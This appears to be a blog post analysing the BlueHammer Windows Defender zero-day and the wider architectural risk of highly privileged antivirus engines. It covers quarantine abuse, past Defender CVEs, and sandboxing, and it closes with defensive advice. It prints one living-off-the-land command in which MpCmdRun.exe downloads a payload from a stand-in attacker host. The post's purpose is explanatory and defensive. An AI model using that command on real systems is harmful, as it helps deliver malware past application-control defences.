· 5 min read ·

When the Antivirus Is the Exploit: The Systemic Problem BlueHammer Exposes

Source: lobsters

There is a particular category of security vulnerability that tends to get buried under headlines about patch urgency: the kind where the security software itself becomes the weapon. The recently disclosed BlueHammer zero-day targeting Windows Defender belongs to this category, and understanding why it keeps happening requires looking past the specific bug and into the architecture that makes such bugs persistently dangerous.

What Windows Defender Actually Is

Most people think of Windows Defender as a background process that occasionally scans files. The reality is considerably more privileged. Windows Defender is composed of several distinct components operating at different levels of the system:

  • MsMpEng.exe (Microsoft Malware Protection Engine): the main service process, running as SYSTEM
  • WdFilter.sys: a kernel-mode minifilter driver that intercepts file system operations before they complete
  • MpEngine.dll: the actual detection engine, loaded into MsMpEng.exe’s process space
  • MpCmdRun.exe: a command-line utility for scanning and management tasks
  • NisSrv.exe: the network inspection service

The minifilter driver deserves particular attention. WdFilter.sys registers with the Windows Filter Manager at a high altitude (around 328010 in the filter stack), which means it sees filesystem operations extremely early, before most other software. It operates in kernel mode with full access to kernel data structures. Any vulnerability in WdFilter.sys is, by definition, a kernel-level vulnerability.

MsMpEng.exe runs continuously as SYSTEM, processes every file that touches the filesystem, inspects network traffic, unpacks archives, parses executables, and evaluates scripting content. The attack surface is enormous by design, because thorough inspection requires seeing everything.

The BlueHammer Technique

BlueHammer exploits the trust relationship between Defender’s components and the operating system. The specific mechanism involves abusing how Defender handles file remediation operations, particularly around quarantine placement and the privileged file moves that accompany them. When Defender quarantines a file, it moves that file into C:\ProgramData\Microsoft\Windows Defender\Quarantine\ using a SYSTEM-level operation. The quarantine format involves wrapping the original file in a container format (sometimes called VBN format), but the underlying file move is a privileged filesystem operation.

Techniques in this family have been documented before. Researcher Jonas Lykkegaard demonstrated quarantine abuse in earlier Defender versions where carefully crafted file paths could cause the privileged quarantine operation to write to attacker-controlled locations. BlueHammer appears to extend this class of attack against more recent Defender versions.

MpCmdRun.exe: The Forgotten LOLBin

Separate from the quarantine abuse angle, MpCmdRun.exe has been a living-off-the-land binary since at least 2021. The utility accepts a -DownloadFile flag:

MpCmdRun.exe -DownloadFile -url https://attacker.example/payload.exe -path C:\Users\Public\payload.exe

This is a signed Microsoft binary, present on virtually every modern Windows system, capable of fetching arbitrary files from the internet. Application control policies (AppLocker, WDAC) that whitelist signed Microsoft binaries will happily permit this. Network monitoring tools that trust traffic from known security processes may not flag it. The binary’s legitimate purpose gives it implicit trust that malicious actors exploit.

Microsoft has not removed this functionality, presumably because it serves legitimate administrative purposes, which is the core tension with LOLBins: the same properties that make them useful make them dangerous.

A History of Trusting the Wrong Process

BlueHammer is one entry in a long catalog. Tavis Ormandy of Google Project Zero called CVE-2017-0290 “the worst Windows remote code execution in recent memory” at the time of disclosure. The bug was in MsMpEng’s JavaScript emulation engine (NScript), which Defender used to evaluate potentially malicious scripts found inside files. The engine would execute this JavaScript with SYSTEM privileges, without sandboxing, triggered merely by placing a malicious file somewhere Windows Defender would scan it, including an email attachment that never needed to be explicitly opened. Ormandy documented the vulnerability in a Project Zero post that remains one of the cleaner write-ups of how deeply a trusted process’s privilege level compounds a parsing vulnerability.

CVE-2021-1647 was a remote code execution vulnerability in MsMpEng with a CVSS score of 7.8, patched in January 2021 and noted as actively exploited in the wild at time of patch. CVE-2023-24934 was a security feature bypass in Windows Defender that allowed attackers to prevent Defender from detecting certain malicious behavior.

The pattern is consistent across antivirus vendors. Symantec had CVE-2016-2208, another Ormandy find, where the antivirus unpacked executables in kernel mode and crashed (or worse) on malformed input. McAfee, Trend Micro, Kaspersky, ESET, and Avast have all had similarly privileged vulnerabilities in their scanning engines over the years. This is not a vendor quality problem; it is an architectural one.

The Architectural Trap

Effective malware detection requires deep visibility: unpacking archives, emulating bytecode, parsing binary formats, evaluating scripts, intercepting system calls. Every one of these operations expands the attack surface proportionally. You cannot have a scanner that reliably detects modern malware without also building a complex parser that processes attacker-controlled input.

The question is how you do that parsing and at what privilege level. MsMpEng historically ran its engine entirely in-process as SYSTEM, meaning a heap overflow in the PE parser or a use-after-free in the JavaScript emulator was immediately a SYSTEM code execution. Modern Defender has introduced Protected Process Light (PPL) to prevent tampering with the service from user-mode, but PPL protects Defender from being killed or modified, not from its own internal vulnerabilities.

Sandboxing the scanning engine is the obvious mitigation. Chromium sandbox the renderer process; PDF readers sandbox the parser; browsers sandbox extensions. Microsoft actually shipped Defender sandbox support in 2018 via the FORCE_DEFENDER_RUN_IN_SANDBOX environment variable, and has been expanding it since. But sandboxing adds overhead, and the kernel components like WdFilter.sys cannot be sandboxed in the traditional sense; they are the kernel.

What This Means in Practice

For anyone running Windows in a security-conscious environment, a few things follow from this.

First, Defender exclusion paths are high-value targets. If an attacker knows which paths are excluded from scanning (perhaps via Get-MpPreference on a compromised system), those paths become safe staging grounds. Exclusions are operationally necessary; documenting and auditing them is equally necessary.

Second, MpCmdRun.exe should be in your list of monitored binaries for outbound network connections. Legitimate use by the Defender service itself is expected; direct invocations from user processes or scripts are worth investigating.

Third, the privilege model of endpoint security tooling deserves the same scrutiny as any other privileged software. The marketing framing of “security software” creates an implicit assumption that it is safer than ordinary software. Its privileged position makes it more dangerous when it goes wrong, not less.

BlueHammer will be patched. The underlying dynamic, that the software best positioned to defend a system is also particularly well positioned to subvert it, will not be patched. It is the cost of deep integration, and it is worth understanding clearly rather than waiting for the next CVE to surface it again.

Was this interesting?